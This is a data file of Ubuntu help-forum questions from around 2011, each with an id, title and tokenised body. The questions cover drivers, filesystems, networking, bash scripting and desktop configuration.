29338	can one still download 10.04 netbook edition	i would like to get the iso image of ubuntu 10.04 netbook edition but ca n't find it on the ubuntu web site . is this file still available ? if so , could someone point me to a link . thanks .
29342	problems with nvidia drivers : white screen with full ( or almost full ) screen apps	my nvidia graphic card is a 7050/610i . my problem is that after upgrading to the last nvidia drivers when i use fullscreen apps ( or almost fullscreen ) the windows goes white . my xorg.conf file : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 270.29 ( buildmeister @ swio-display-x86-rhel47-02.nvidia.com ) wed feb 23 16:38:34 pst 2011 section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' option `` addargbglxvisuals '' `` true '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' # generated from default endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` device '' identifier `` device0 '' vendorname `` nvidia corporation '' driver `` nvidia '' option `` nologo '' `` true '' endsection any idea on how to solve this ? < -- sorry for bad english , ask for more info -- >
29344	adding ppa on install	i have a app i am packaging for ubuntu . i do n't like the idea that if included in the ubuntu repositories i will have no control over updating that application . i do n't want my users stuck on an out dated version for up to 6 months . i also do not want my users to have to manually add a ppa themselves to get updates as the target user will not have the technical know how to do this . is it ok to have my .deb add a ppa on install . so that i can roll out stable updates to my ubuntu users .
29345	software versions of lts and non-lts releases synced from debian	i read that lts releases are based on debian testing while non-lts releases are based on debian unstable . given the long release cycle of debian , is it possible for some software to be of a more recent version in a non-lts release x than in an lts release x+1 ? if yes , would there be a difference between doing an upgrade and a fresh install when going from x to x+1 ?
29350	how can i optimise ext4 for reliability ?	as ext4 was introduced as more reliable than ext3 with block journals , is there any chance to suppose it 100 % reliable ? what if enabling block journaling on it , which is disabled by default ? as friend 's guide to explain my case in more detail : i have an embedded linux device , after installation keyboard and monitor is detached and it works standalone . my duty is to make sure it has reliable file-system so with errors there is no way for manual correct faults on device . i ca n't force my customer to use a ups with each device to ensure no fault by power-failure . what more can ext4 offer me besides block journaling ? thanks in advance .
29352	why do i still get an older version of dropbox when downloading the latest one ?	in natty i downloaded the latest version of dropbox from their website . it should come with an appindicator rather than a systray icon , and it does so on my other maverick installation . however , it does not for some reason . that is very inconvenient , as these icons are blocked in natty . i suppose that for some reason the system still installed an older version of dropbox . how can i fix that/get the latest version to install ?
29354	migrate ldap to another server	i have ubuntu ( 8.10 ) ldap server running . i am migrating from my old servers to ubuntu 10.04.2 server and i have set up almost all freshly on the new servers . how could i perfectly migrate ldap to the new server after installing ldap ? . i found the following to export and import ldap in the google : slapcat -l master.ldif slapadd -c -l master.ldif is there anything i 've to do before/after using those commands ? . any precautions ? edit 1 : i could not configure ldap server freshly following the link : error : root @ station3 : ` # ldapadd -d cn=admin , dc=mydomain , dc=com -w -f front-end.ldif enter ldap password : ldap_bind : invalid credentials ( 49 )
29356	is it possible to copy a file into a zip archive ?	i want to copy a file into a zip or jar archive . is that possible ? if so how ?
29359	how to add user without /home	i want to create a new user to run a service on the system but do n't want to have /home and other configuration files for it . like there is a user for postgres but it does n't have any /home directory .
29363	seperate distribution for unity2d ?	will there be a seperate distribution for unity 2d ?
29365	ca n't start ubuntu on vaio z	i 'm trying to install ubuntu 10.10 32bit on this pc . i have both tried with wubi from windows and from usb stick , but after the installation process when i select to boot ubuntu the screen becomes black and nothing happens ( btw i can hear the cpu running ) ! notice that maybe it is something related to the graphic card of the pc , since when i use ubuntu in live mode or during the installation process all the graphics and colors are messed up as if there was n't an appropriate diriver ... what can i do ? ? thanks
29367	ca n't connect to the internet via pppoe dsl	i am on a wired dsl , pppoe connection which is properly set , but the problem is that is shows that is connected but there is no internet at all . i thought that the problem was the ipv6 and i managed to disable it , but now in nm the eth0 ipv4 address is 0.0.0.0 . i do n't know what the problem is : ) , weird . i also edited the interfaces file by adding the new interface auto eth0 and setting it to be dhcp . i restarted the dhcp server and got some errors i think , it says `` no leases ... '' whatever . any ideas what the problem could be ? why it is not giving me ip address ? it is weird that when i work with my wireless there is no problem , it connects auto and the internet is just fine .
29370	how to check if a command succeeded ?	is there any way to check if there is an error in executing a command ? example : test1=`sed -i `` / : @ /c connection.url=jdbc : oracle : thin : @ $ ip:1521 : $ database '' $ search` valid $ test1 function valid ( ) { if $ test -eq 1 ; then echo `` ok '' else echo `` error '' fi } i already tried do that but it seems it is n't working . i do n't how do that .
29380	information about sata , ide ( pata ) controllers	i have a remote computer on which i want to install a new hard drive for rsync backup . the problem is , i do n't know what controller technology is used ( pata , sata , sata2 , ... ) and how many available slots are left . i want to spare me an unnecessary drive just for opening the chassis and looking into wires . how do i query the sata or pata controllers ? i 'm interested in the following points : which controllers exist in the machine how many ( and which ) disks are attached to each controller how many available slots are there
29381	running command on remote database ( oracle ) from local server using sqlplus	i want to run a command on remote database ( oracle ) from local server using sqlplus , eg : sqlplus user/pass @ db `` command '' what 's the syntax for it ? i want to use the command exit ( from database ) just to test something in a unix script .
29385	is there a pc-to-phone application ?	is there an application ( non-commercial ) to make phone calls from pc to phone on ubuntu ?
29387	disable tv tuner at boot	i have a tv tuner card ( leadtek winfast tv2000 global ) . it is n't fully supported by ubuntu ( and linux kernel ) . it is n't a problem , because my dad only use it in windows . but i 've got an error message every ubuntu boot . can i disable this device for ubuntu ?
29389	is it possible to rebind ctrl+alt to the meta key ?	i 'm using the awesome window manager , and it 's , well , awesome . however , i have a slight issue - i 'm using an ibm model m keyboard , which lacks the meta key . this is kind of a problem , as awesome relies on it for basically every action you can make . i do tend to use my ctrl and alt keys quite often , so i 'm not really able to remap those - however what i would like to be able to do is remap ctrl+alt to fire a meta event . is this possible ? i 've toyed around with xkeycaps and done some searches on `` rebind ctrl+alt '' but most of the results give me either swapping the two keys or something else . ( also , i use caps-lock as an additional control , or i would just map that one . ) any help would be greatly appreciated ! thanks !
29394	youtube entirely crashes the computer	about a week ago a regular synaptic update ran in the background . ever since , when i try to watch a youtube video ( just hitting `` play '' on the video ) the monitor goes black for a moment , then there are just random bars of colour flashing . the only way to fix it is to turn the computer off using the power button and then restarting the computer . i 'm using ubuntu 10.04 . it looks like a lot of people have had troubles since that update ( red videos , videos that just do n't work ) but i have n't found anybody with this kind of spectacular crash . i 've tried both firefox and chromium , same results . any ideas ?
29395	no visual clues as to hibernation status	when my laptop goes into or comes out of hibernation i 'm presented with only a blank screen . is there any way of providing a progress indicator for hibernation , similar to that of the boot screen for example ?
29405	`` clean up by name '' to the right , like on a mac	hi , how do i `` clean up by name '' so that my icons are sorted from the right instead from the left as it is now . i have ubuntu 10.04 lts . if you right click in your desktop in ubuntu you get a list where you can `` clean up by name '' .
29407	having to log in twice after screen lockout	i 'm on ubuntu 10.04.2 lts desktop . ( and by scanning /boot , it appears i might be on kernel 2.6.32-29-generic ? not certain . ) anyway , after my last system update , now my screen lock asks me to login twice , whereas before it did not require this . i assume this is a bug ? and is there a way to undo this for now until the bug is fixed ?
29409	installing connectwise	i 'm wondering if anyone out that has been able to install connectwise psa on ubuntu ? i 've got wine up and running , and i know connectwise needs microsoft .net 3.5 . can i just install .net through wine , or would i have to go the route of installing mono , then trying to install connectwise ?
29410	are there more brasero plugins available ?	i 'm coming to like brasero more than i did before ( hardly used it in the past to be honest ) , and now i 'm wondering , are the plugins that come with the default install the only available plugins ? i do n't remember seeing any in apt , so i guess they would have to be plugins you download , compile and install ( fun fun fun : p ! ) .
29412	how to get nicer error-messages in this bash-script ?	i 'm trying to catch any error when run a command in order to write a log-file / report i 've tried this code : function valid ( ) { if [ $ ? -eq 0 ] ; then echo `` $ var1 '' `` : status : ok '' else echo `` $ var1 '' `` : status : error '' fi } function save ( ) { sed -i `` / : @ /c connection.url=jdbc : oracle : thin : @ $ ip:1521 : $ database '' $ search var1= '' adding database ip '' valid $ var1 sed -i `` /connection.username/c connection.username= $ name '' # $ search var1= '' addning database sid '' valid $ var1 } save the output looks like this : adding database ip : status : ok sed : no input file but i want it to look like this : adding database ip : status : ok sed : no input file : status : error '' or this : adding database ip : status : ok addning database sid : status : error '' i 've been trying , but it 's not working with me . : (
29421	error compressing files in /var/www with to .7z with password protection	i am making a website that i run with apache from var/www , i have stopped the apache server and closed gvim , but when i right click on compress , select .7z compression with password . i get an error : an error occurred while adding files to archive . i can copy the files , so why ca n't i compress them like this ? i can also compress the files when i move the files to my home folder ...
29422	terminal error messages : bash : /dev/cgroup/cpu/user/2823/tasks : no such file or directory	this is what i get when i start up the terminal : bash : /dev/cgroup/cpu/user/2823/tasks : no such file or directory bash : /dev/cgroup/cpu/user/2823/notify_on_release : no such file or directory bash : /dev/cgroup/cpu/user/2823/tasks : no such file or directory bash : /dev/cgroup/cpu/user/2823/notify_on_release : no such file or directory sasa @ sasa : ~ $ *** i reinstalled 10.10 yesterday because of other problems , i did n't have this error message before . i have a separate /home partition , and new installation picked up almost all of the old settings , also those which i do n't like , but it looks like that is not a problem or maybe i am wrong ? would n't ask if i knew ! : ) i 'll be glad to post more info if someone needs it !
29424	is there a system in the predefined keyboard bindings ?	is it possible to load some alternate predefined settings which are more systematic than the default ? imho , a window manager should stick with a single modifier ( e.g . super ) and use only key combinations including this modifier . so let e.g . super-1 switch do desktop 1 , let shift-super-2 move the current window to desktop 2 , let super-f1 open a menu , but leave alt-f1 and all others alone . i find especially control-alt-backspace for killing the x-server a real `` killer '' feature , given that control-alt-\ is a common emacs shortcut ( a bit of fat-fingering and see you later ) . to me it the default bindings look like a huge chaos . i always try to use keyboard as efficiently as possible in the emacs style ( escape-meta-alt-control-shift ) , but it conflicts with the predefined chaos .
29425	slow ubuntu 10.04 after long time unused	i 'm at spring break so i 'm back at my parent 's house . i 've turned my computer on which has been off since january and its unusably slow . this was not the case when i last used the computer in january . it is running 10.04 , memory : 875.5 mb cpu : amd athlon 64 x2 dual core processor 4400+ available disk space : 330.8 gb i 'm not seeing a large usage of either memory or disk i/o . if i look at my list of processes there is only a very small amount of cpu usage . however , if i hover over the cpu usage graph that i 've on the top bar , i sometimes get really high readings like 100 % . it took a long time to boot , to open firefox , to open a link in firefox . as far as i can tell everything that the computer tries to do is just massively slow . right now , i 'm apt-get dist-upgrading to install any updates that i will have missed since last time this computer was on . any ideas as to what is going on here ? update : i thought to check dmesg and it has a lot of entries like this : [ 1870.142201 ] ata3.00 : exception emask 0x0 sact 0x7 serr 0x0 action 0x0 [ 1870.142206 ] ata3.00 : irq_stat 0x40000008 [ 1870.142210 ] ata3.00 : failed command : read fpdma queued [ 1870.142217 ] ata3.00 : cmd 60/08:10 : c0:4a:65/00:00:03:00:00/40 tag 2 ncq 4096 in [ 1870.142218 ] res 41/40:00 : c5:4a:65/00:00:03:00:00/40 emask 0x409 ( media error ) < f > [ 1870.142221 ] ata3.00 : status : { drdy err } [ 1870.142223 ] ata3.00 : error : { unc } [ 1870.143981 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1870.146758 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1870.146761 ] ata3.00 : configured for udma/133 [ 1870.146777 ] ata3 : eh complete [ 1872.092269 ] ata3.00 : exception emask 0x0 sact 0x7 serr 0x0 action 0x0 [ 1872.092274 ] ata3.00 : irq_stat 0x40000008 [ 1872.092278 ] ata3.00 : failed command : read fpdma queued [ 1872.092285 ] ata3.00 : cmd 60/08:00 : c0:4a:65/00:00:03:00:00/40 tag 0 ncq 4096 in [ 1872.092287 ] res 41/40:00 : c5:4a:65/00:00:03:00:00/40 emask 0x409 ( media error ) < f > [ 1872.092289 ] ata3.00 : status : { drdy err } [ 1872.092292 ] ata3.00 : error : { unc } [ 1872.094050 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1872.096795 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1872.096798 ] ata3.00 : configured for udma/133 [ 1872.096814 ] ata3 : eh complete [ 1874.042279 ] ata3.00 : exception emask 0x0 sact 0x7 serr 0x0 action 0x0 [ 1874.042285 ] ata3.00 : irq_stat 0x40000008 [ 1874.042289 ] ata3.00 : failed command : read fpdma queued [ 1874.042296 ] ata3.00 : cmd 60/08:10 : c0:4a:65/00:00:03:00:00/40 tag 2 ncq 4096 in [ 1874.042297 ] res 41/40:00 : c5:4a:65/00:00:03:00:00/40 emask 0x409 ( media error ) < f > [ 1874.042300 ] ata3.00 : status : { drdy err } [ 1874.042302 ] ata3.00 : error : { unc } [ 1874.044048 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1874.046837 ] ata3.00 : sb600 ahci : limiting to 255 sectors per cmd [ 1874.046840 ] ata3.00 : configured for udma/133 [ 1874.046861 ] sd 2:0:0:0 : [ sda ] unhandled sense code [ 1874.046863 ] sd 2:0:0:0 : [ sda ] result : hostbyte=did_ok driverbyte=driver_sense [ 1874.046867 ] sd 2:0:0:0 : [ sda ] sense key : medium error [ current ] [ descriptor ] [ 1874.046872 ] descriptor sense data with sense descriptors ( in hex ) : [ 1874.046874 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 1874.046883 ] 03 65 4a c5 [ 1874.046886 ] sd 2:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed [ 1874.046892 ] sd 2:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 03 65 4a c0 00 00 08 00 [ 1874.046900 ] end_request : i/o error , dev sda , sector 56969925 [ 1874.046920 ] ata3 : eh complete i 'm not certain , but that looks like my problem may be a failing hard drive . but the drive is less then a year old , it really should n't be failing now ...
29428	ubuntu to replace vista and thereby reboot my computer ?	ubuntu was recommended to me as a viable option to vista . i am unable to boot up my computer and have no recovery media . i keep seeing 'bootmgr is missing ' on the screen . if i were to download ubuntu and then burn it to a disc or discs : a . would it have the bootmgr as a part of the program ? b . could i then go into bios and boot up my computer from the disc drive with ubuntu overwriting vista thereby reviving my computer ? thank you all .
29433	path for mounted iso	i need to access my mounted iso in terminal but where it is mounted ? my partitions used to mount in /media what are the general paths for where different things are mounted ? edit : i mounted my iso by just double clicking it ( ubuntu 10.10 )
29434	how can i maximally compress .gz files in nautilus ?	when selecting compress ... from the right click context menu in nautilus i am able to quickly compress files to .gz format . however by default nautilus does not use maximum compression . can i make nautilus to use maximum compression like gzip -9 ? using gconftool or gconf-editor to set the compression_level for file roller to maximum seems right but infortunately has not the desired effect and will not lead to maximum compressed files . as this is the expected way of how to set compression levels a bug report has been filed upstream . any ideas for a workaround are welcome .
29436	i have ubuntu 9.04 on my xen vps - can i upgrade it to 10.10 ?	i use ubuntu 9.04 ( the most recent version that the vps host provided ) on a xen vps . the kernel version seem to be something xen-specific : 2.6.18-194.32.1.el5xen . i would like to have the most recent version of ubuntu server , 10.10 . can i upgrade my vps to 10.10 or do i need to stay with this version because it seem to be a xen-specific kernel ?
29437	is there a way to make the launcher get out of the way of open windows ?	is there a way to make the launcher `` dodge '' open windows in ubuntu 10.10 netbook edition ?
29443	computer wo n't wake from hibernate	so i have a pretty dumb problem ... i accidentaly pressed hibernate while trying to restart ... since then my computer wont boot into ubuntu anymore ( through normal mode or single user mode - rescue mode that is ) ... all i get is : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys/ on root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or dirctory target filesystem does n't have requested /sbin/init . no init found . try passing init= boot arg . busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) obviously i tried to fire up the live cd and run fsck ( or e2fsck ) from there ( or just try to do a check of /dev/sdb1 my partition via gparted - which is basically the same thing ) . but it does n't allow me ... both gparted and fsck say that the device is busy ( i ca n't even mount it in the livecd to rescue data ) ... umount /dev/sdb1 says its not mounted ... any ideas ?
29444	get drive information	how can i get more information about devices ? for example how do i determine what /dev/sda1 is ?
29445	how does gimp compare to photoshop ?	please be specific ( apart from the obvious , eg . free and open source vs commercial support ) . i need this information in order to be certain as to what to expect and what not to expect from gimp .
29446	how to stop gecko-mediaplayer from buffering endlessly ?	i 'm using the gecko-mediaplayer plugin ( formerly `` mplayerplug-in '' ) . the totem plugin was not always working correctly with opera , and i 'm actually depending on the [ copy url ] feature of gecko-mediaplayer . however that plugin does some inept buffering of videos . it seems to default to 20 % caching regardless of what you set in the preferences window . this is quite annoying for big video files . but appearantly it 's by design http : //groups.google.com/group/gecko-mediaplayer/browse_thread/thread/b7f0f5a3cedc8979 the gentoo forums listed some workaround http : //forums.gentoo.org/viewtopic-t-816690.html - but ~/.config/gecko-mediaplayer/gecko-mediaplayer.conf is not working in the ubuntu version . does anyone know the actual way to configure the cache= size . which is the real configuration filename under ubuntu ? i 've now tried that gconf registry , but apps > gecko-mediaplayer > preferenes > cache has no effect either .
29452	what does the 'userspace file system ' compiz plugin do ?	what does this plugin do ? it does not appear to be possible to enable it using compiz from the repositories , but i would still like to learn what the plugin does so i can decide whether it might be useful to me .
29457	sound driver for motherboard gigabyte ga-g1975x-c ( creative sound blaster live 24-bit ) ( alsa , ca0106 )	my motherboard is gigabyte ga-g1975x-c with integrated audio `` creative sound blaster live 24-bit '' . i have installed ubuntu 10.10 , and there was no sound at all . alsa drivers was already installed . finally after long searching , i have found how to make my sound work . /etc/modprobe.d/alsa-base.conf : options snd-ca0106 subsystem=0x10121102 //i have added this line and restart after restarting my speakers and microfon works fine . maybe somebody knows different/better subsystem code for my sound card ? ? ?
29461	is there a way to change the formatting of a single word in gimp ?	just a quick question but i ca n't figure out if it 's just not possible , ( which is fine , workaround is easy enough just time consuming ) , or if i 'm too blind to see it . for example , i want to put one word in a text in bold , or in a different color . is there any way ? i 'm used to this functionality in photoshop , i 'm sure you guys know what i mean . if it 's not there , what 's the best workaround ? just put a bunch of spaces in there and make a new text-layer with the word and the different formatting ?
29462	how to change applications menu contents	in gnome applications menu , i would like to move gedit , gnu emacs , kwrite , kate , nedit and scribes from the accessories menu , to the programming menu . is there any simple way to do this ?
29463	iptables unresolved dependencies	i 'm trying to setup openvpn access server on a vps running ubuntu 9.10 for a friend so she can play games from her uni campus . the problem is i keep running into this error when trying to start openvpn . service deferred error : iptablesservicebase : failed to run iptables-restore [ status=1 ] : [ 'fatal : could not load /lib/modules/2.6.18-028stab070.14/modules.dep : no such file or directory ' , 'fatal : could not load /lib/modules/2.6.18-028stab070.14/modules.dep : no such file or directory ' , 'iptables-restore : line 46 failed ' ] : internet/base:1175 , internet/base:752 , internet/process:45 , internet/process:306 , internet/_baseprocess:48 , internet/process:775 , internet/_baseprocess:60 , svc/pp:116 , svc/svcnotify:26 , internet/defer:238 , internet/defer:307 , internet/defer:323 , sagent/ipts:105 , sagent/ipts:39 , util/error:52 , util/error:32 service failed to start due to unresolved dependencies : set ( [ 'user ' , 'iptables_openvpn ' ] ) service failed to start due to unresolved dependencies : set ( [ 'user ' , 'iptables_openvpn ' ] ) service failed to start due to unresolved dependencies : set ( [ 'iptables_openvpn ' ] ) now i 've already got my provider to enabled the tun/tap device driver and i checked this using # cat /dev/net/tun which returned âfile descriptor in bad stateâ which i believe means it 's enabled . after extensive searching , i 've been unable to find any solution other than people suggesting to make sure tun/tap device driver is enabled . any ideas on how to solve my issue ? i 'm not very experience with linux and i feel in over my head here so any advice is greatly appreciated .
29468	how do i rollback to firefox to 3.6 from a ppa version ?	i foolishly upgraded my firefox install on ubuntu to the beta 4 release , i believe by adding the ppa repository -- is there an easy way to roll it back to the 3.6 version provided by ubuntu ?
29474	why does my name resolution hit the dns even with a hosts file entry ?	i 'm running ubuntu 10.04.2 lts desktop . being a web developer , naturally i created a `` me.com '' in my /etc/hosts file . unfortunately , my name resolution is going out to the dns before first checking my local hosts entry and i ca n't figure out why . the end result is that if my /etc/resolv.conf contains nameserver 127.0.0.1 in there first , then i get a response back in my web browser from me.com ( local ) within less than a second . but if i do n't have that entry , then my response takes sometimes as much as 5 seconds if my isp is a little slow . the problem was so troublesome that i actually had to file a question here ( and someone resolved it ) for how to automatically insert that entry into /etc/resolv.conf . but one of the users ( @ shellholic ) here highly recommended ( and commented back and forth with me about it ) that i should file this question . do you know why my workstation 's name resolution has to hit the dns server first before hitting my /etc/hosts file entry ? for now , i 'm using the resolv.conf trick .
29475	screen off animation similar to android gingerbread ?	just curious , but i love the look . http : //www.youtube.com/watch ? v=-lv1p4tvrw4 is there something similar to this for ubuntu , when shutting down , or logging out , or even when the screen goes to sleep ?
29476	how to install over http in virtual manager ?	i am having a situation where i can not use a cd or pxe boot or wubi to install.i need to necessarily do an http install of ubuntu.i am basically trying to create a guest os in a virtualization setup on xen on a non vt hardware . on a non vt hardware the virt-manager does not allow to install from local iso or pxe even the only option is via a url on http : // here is what i did : download ubuntu 10.04 32 bit iso kept it in /var/www ( apache2 is running ) renamed it to ubuntu.iso and when i reached a stage where installation begins i gave path http : //localhost/ubuntu.iso but i got an error any installable distribution not found . after this i did mkdir /var/www/sk mount -t iso9660 /var/www/ubuntu.iso /var/www/sk -o loop and this time during the installation i gave path http : //localhost/sk i was able to see the contents in browser http : //localhost/sk which you will see in a normal cd . but beginning installation i got same error valueerror : could not find an installable distribution at 'http : //localhost/sk so i want to just confirm if http install is done only this way or some other way because the installation is not proceeding .
29477	ubuntu can not see windows 7 partitions on install	i 've been trying to install ubuntu 10.10 as a dual boot with windows 7 on my dell latitude e6510 . it is currently running windows 7 and i have used the ms disk tools to shrink the win 7 ntfs partition to make room for linux . the issue i 'm having is that when i run ubuntus installer by booting from cd it sees the entire hard drive as unallocated space . i have also tried kbuntu 10.10 , fedora 14 , booting a gparted 0.8.0 usb drive , and ubuntu `` install in windows '' with wubi they all have problems . edit : when i run the `` try ubuntu '' option on booting from cd it can mount my windows partition and i can view the files . the output of sudo parted -l when running in try ubuntu mode : warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? yes model : ata st9500420as ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
29478	monitor height differences & the mouse going off screen	in ubuntu 10.10 i have a dual monitor setup . i have an nvidia graphics card and am using twinview . one of the monitors is 1024 pixels high and the other is 900 . in the monitor configuration screen & in real life , i have them set up side by side , 1024 on the left . the result of this is that when i am on the bottom of the left monitor and move the mouse to the right , it goes into the hidden area below the right monitor 's visible area . it seems like it would make a lot more sense for it to be bumped up to the bottom of the right monitor - since one almost never wants to move the mouse into an area of the screen that does n't show up . and , systems i have used before have been set up that way . how can i set this up ? i am not interested in lists of window managers for ubuntu ; i would like to know the identity of a particular wm or set of steps i can take to solves the particular problem i have outlined above . thanks ! edit : i changed to use two seperate x window monitors , and it works better . if you cross in an area that the target monitor does n't cover , the software just puts you at the nearest point to where you crossed . edit later : you can use xcreatemousevoid to do this ; i used it to improve the setup even more in connecting two monitors at the corners using xcreatemousevoid has the advantage of letting you use just one x window , so alt-tab shows all windows and you can move them between the screens without any dead areas .
29481	how can i run samba ?	i have server running ubuntu 10.10 . never used samba before , as i never had windows machines , but now i need it . so i did : apt-get install samba smbfs smbclient . packages are installed , but i have no idea how to configure it . all howtos i found on the net relate to /etc/samba/something.conf , where i do n't even have /etc/samba directory . the only config i found is /etc/default/samba , which contains ( aside from comments ) only : run_mode= '' daemons '' all i want is to be able to have access to some directories on the ubuntu machine from windows , nothing else .
29482	getting touchpad to work in desktop ubuntu	i bought a small touchpad to stick on top of the keyboard , and it works fine on the windows computer , but not on my ubuntu desktop . i mean , when i do `` xinput list '' it shows the following : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=8 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb-ps/2 optical mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft wired keyboard 600 id=13 [ slave pointer ( 2 ) ] ⎜ ↳ macintosh mouse button emulation id=14 [ slave pointer ( 2 ) ] ⎜ ↳ cirque corporation 9925 ag touchpad id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ no brand sp04-a1 id=9 [ slave keyboard ( 3 ) ] ↳ elite silicon usb audio device id=10 [ slave keyboard ( 3 ) ] ↳ microsoft wired keyboard 600 id=12 [ slave keyboard ( 3 ) ] the cirque corporation touchpad ( i 'm assuming that 's the component name ) is the touchpad . is there anything i 'm missing ?
29483	software for text search in files	i am looking for a software that will search text in files from a folder similar to xyplorer . is there something similar ?
29486	bluetooth file transfer in shell script	i 'd like to send files to my phone via bluetooth using a bash script or something similar . the ussp-push utility works , but i find it is much slower than the `` send to '' option in gnome . is there a way to use gnome 's bluetooth functionality from a shell scirpt ?
29487	how do i remove an extra dock in cairo dock ?	i have two cairo docks , one is at the bottom , one is at the top of my desktop . how do i remove the top dock ?
29489	japanese ime clueless about certain words	i have the impression that japanese input method editor ( 変換 ) is not as good as it used to be ( ca n't tell since when ) . when i type `` terekomu '' and transform , the ime does not propose テレコム ( a very usual word ) but テレ込む which makes no sense . using ubuntu 10.10 , everything by default ( which means ibus 1.3.7/anthy ) . is it a known bug i just did not notice before ? can i fix it somehow ?
29490	connecting two monitors at the corners	i am using two separate x screens on two monitors and i would like them to be connected at the lower right corner . that is , if you move to the lower right corner of screen0 the mouse should appear at the upper left of screen1 . i do not want an entire edge of each monitor to be permeable to the mouse . i modified the xorg.conf file like so : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' relative `` screen0 '' 1200 1000 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection ( screen 0 's resolution is 1280x1024 ) so there is a bit of overlap . however whenever i move the mouse to the bottom of screen0 , the pointer appears at the upper left of screen1 . and , the entire top of screen1 is permeable to the mouse and brings it to the lower left corner of screen0 . i have tried various numbers in following the `` relative '' statement - if i put 1280 1024 the mouse does not cross over at all . if i use 1280 1023 the entire right side of screen0 is permeable . i have n't been able to find any documentation about how to explicitly tell the mouse where to crossover - is there some ? it seems that xorg is being really aggressive in guessing where the mouse crossover should take place . does anyone know how to do this ? thanks !
29498	optimize video filesize without quality loss	is there a simple way ( on the command line - i want to write a script which compresses all videos in a folder ) to reduce the filesize of a video ( almost ) without quality loss ? is there a method which works equally well for different video format ( mp4 , flv , m4v , mpg , mov , avi ) ? i should mention that most of the videos i would like to compress are downloaded web-videos ( mp4 , flv ) , so it 's not clear if there is much room for further compression .
29499	how to enable nautilus mounted remote shares in a file system dialog	i can see the remote share from nautilus and browse to it . i want to access that share from another application in this case , eclipse - which is using the standard open file dialog . is there a convenient way i can do this from nautilus ? i can not find that share anyway on the file system , mnt or media ... is it somewhere ? how do i put it somewhere if it is now .
29502	how to get a windows close/minimize buttons in top gnome panel ?	i want to get any application 's close/minimize button in top gnome-panel . please note that my top gnome-panel also has global-menu applet . is there any app which can do that ?
29511	sudo permissions error	i am getting the following error : sudo : unable to resolve host xxx sudo : /etc/sudoers is mode 0666 , should be 0440 segmentation fault to start xampp , i typed sudo /opt/lampp/lampp start please help . how can i solve this ? thanks .
29512	how can i make the color reverse application autostart when i log in ?	the application make the color reversed when i type super+m . i do n't know what 's its name , and how can i make it start automatically when i log in ?
29513	tag and manage video files	i have lots of video files on my hard drive and i want to manage and sort them using tags . so my question is : what do you think is the best way to do this ?
29515	permission error on ubuntu ?	hi , i am getting the following error : sudo : unable to resolve host xxx sudo : /etc/sudoers is mode 0666 , should be 0440 segmentation fault to start xampp , i typed sudo /opt/lampp/lampp start please help , how can i solve this ? thanks .
29519	schedule sending mail of a log file content	i have postfix mail agent installed and i 've configured gmail relay and i could send mails from the terminal as below : root @ statino1 : ~ # mail -s `` subject_here '' my_gmail_id @ gmail.com cc : < hit enter for empty cc > type the mesage here press ctrl+d i have to send a log file contents as a mail and schedule it to run everyday . how do i send log file contents as mail message , how do i automate the inputs of mail command ? so that i can schedule it . anybody has any idea ?
29523	automatically sync a folder to a usb when usb is plugged in ?	is there a way to sync a folder to an usb drive when the drive is plugged in ? i 'd like it to sync , or copy over changes , both ways . i 've seen the back in time and unison-gtk applications , but i 'd like for it to run as soon as the drive is mounted . what i mean is , unintrusively sync the two folders without any input from myself besides setting it up . if this is n't possible , is it possible to run the application when the thumb drive is plugged in to remind myself to sync manually ? thanks !
29526	how do i reset the thumbnail cache ?	i have a lot of images on my laptop as i work in graphics . on the same system , i also have a folder containing my family pictures . i would like to do two things : empty the already cached images and then '' blacklist '' or exclude the folder holding the family pictures as i use shotwell for organizing/adding/deleting these files in the settings of nautilus you can only change global settings . any ideas ?
29533	install mysql without apt-get	i want to install mysql but my internet connection is very slow so i decided to download the database from the mysql site . i have read this question , but i do n't have any friends using ubuntu .
